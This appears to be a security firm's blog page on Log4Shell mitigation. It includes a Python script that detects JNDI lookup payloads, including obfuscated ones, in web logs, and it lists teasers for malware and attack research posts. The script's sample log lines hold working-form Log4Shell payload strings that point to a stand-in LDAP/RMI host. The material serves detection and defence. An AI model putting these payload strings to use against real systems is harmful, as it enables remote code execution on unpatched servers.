GoSecure Blog
Get the Latest from GoSecure Titan Labs on Mitigation and Remediation for the Log4Shell Vulnerability
Updated on 12/15/2021 with the latest mitigation strategies for CVE-2021-44228 and CVE-2021-45046, including the status of Log4j 1.2
GoSecure has been closely monitoring the Log4Shell vulnerability since it was disclosed. Not only have we been proactively hunting across GoSecure Titan Managed Detection & Response (MDR), but we have also helped clients monitor for and patch the vulnerability through GoSecure Vulnerability Management as a Service (VMaaS) and supported clients with our other managed security solutions.
So far, none of our GoSecure Titan MDR customers have been impacted by Log4Shell. The GoSecure Active Response Center (ARC) remains vigilant for any signs of breaches and new MDR detections have been added to increase the visibility of known Log4Shell activity.
To increase our detection and blocking capabilities, GoSecure Titan Labs performed extensive research on the vulnerability. The results of that work can be found in this blog, including some recommended mitigation and remediation actions.
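As an added illustration of the kind of visibility the MDR detections above aim for, the following Python snippet is not GoSecure's detection logic and not code from the blog post; it is an example written for this page. It scans constructed web-server log lines for the `${jndi:...}` lookup that triggers CVE-2021-44228, first collapsing the two most common obfuscations seen in the wild (`${lower:x}`/`${upper:x}` wrappers and `${...:-x}` default-value tricks) so that a split-up payload is still recognized. The sample log lines and the 203.0.113.7 address are constructed for the example; real traffic uses many more evasion forms, so treat the normalizer as a starting point rather than a complete filter.

```python
import re

# Constructed sample log lines (not from any GoSecure customer data):
# a plain payload, an obfuscated payload, and two benign requests.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:r}mi://203.0.113.7/x}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=jndi HTTP/1.1" 200 1024 "-" '
    '"curl/7.79"',
]

# ${lower:j} / ${upper:j}  -> j   (Log4j case-conversion lookups used to split the keyword)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${env:NOTSET:-j}         -> j   (default-value syntax: an unset variable yields the default)
_DEFAULT_LOOKUP = re.compile(r"\$\{([a-z0-9:\-]*?):-([^{}]*)\}", re.IGNORECASE)

# Schemes a JNDI lookup can use; any of them following "${jndi:" is worth an alert.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:[^}]*\}",
    re.IGNORECASE,
)


def normalize(text, max_rounds=10):
    """Collapse nested case/default lookups until the string stops changing.

    The loop is bounded so a pathological input cannot spin forever.
    """
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(2), new)
        if new == text:
            break
        text = new
    return text


def find_log4shell_hits(lines):
    """Return (line_index, scheme, normalized_payload) for every line carrying a JNDI lookup."""
    hits = []
    for idx, line in enumerate(lines):
        normalized = normalize(line)
        match = _JNDI.search(normalized)
        if match:
            hits.append((idx, match.group(1).lower(), match.group(0)))
    return hits


if __name__ == "__main__":
    for idx, scheme, payload in find_log4shell_hits(SAMPLE_LINES):
        print(f"line {idx}: jndi scheme={scheme} payload={payload}")
```

Running the block flags lines 0 and 1 only; line 3 contains the word "jndi" in a query string but no `${...}` lookup, which is exactly the false positive a bare keyword grep would produce. Matching on the normalized form is what catches the second line, where the keyword never appears contiguously in the raw log.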
TrickBot Leverages Zoom Work from Home Interview Malspam, Heaven’s Gate and… Spamhaus?
The team of expert analysts at GoSecure Titan Labs have reverse-engineered a new TrickBot delivery chain cleverly hidden in a Zoom job interview email, using a sample obtained from GoSecure Titan Inbox Detection and Response (IDR). The email message contained a shortcut (LNK) file entitled Interview_details.lnk, and that LNK file downloads a loader which is examined in this blog. GoSecure Titan Labs named the loader TrickGate because it uses the Heaven's Gate technique to load TrickBot, one of the world's most prevalent botnets.
GoSecure Investigates Abusing Windows Server Update Services (WSUS) to Enable NTLM Relaying Attacks
In part three of a series, GoSecure ethical hackers have found another way to exploit insecure Windows Server Update Services (WSUS) configurations. By taking advantage of the authentication provided by the Windows update client and relaying it to other domain services, we found this can lead to remote code execution. In this blog, we’ll share our findings and recommend mitigations.
New Malware “Gameloader” in Discord Malspam Campaign Identified by GoSecure Titan Labs
The expert investigators at GoSecure Titan Labs have found, analyzed and created signatures to detect a new malware that they call Gameloader, since it and its variants contain numerous strings that make them look like video games. The file Titan Labs used for their research was a Rich Text Format (RTF) file entitled New Purchase Order from Alibaba.doc, provided by the GoSecure Titan Inbox Detection and Response (IDR) team. The RTF file downloads a 32-bit .NET loader, which in turn loads FormBook Stealer. The following is an in-depth analysis of Gameloader.
A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection
GoSecure ethical hackers found a bug in MySQL's handling of scientific notation that has security consequences. As a result, AWS Web Application Firewall (WAF) customers were left unprotected against SQL injection. Our research team further confirmed ModSecurity to be affected, but protection is within reach, as described in this blog.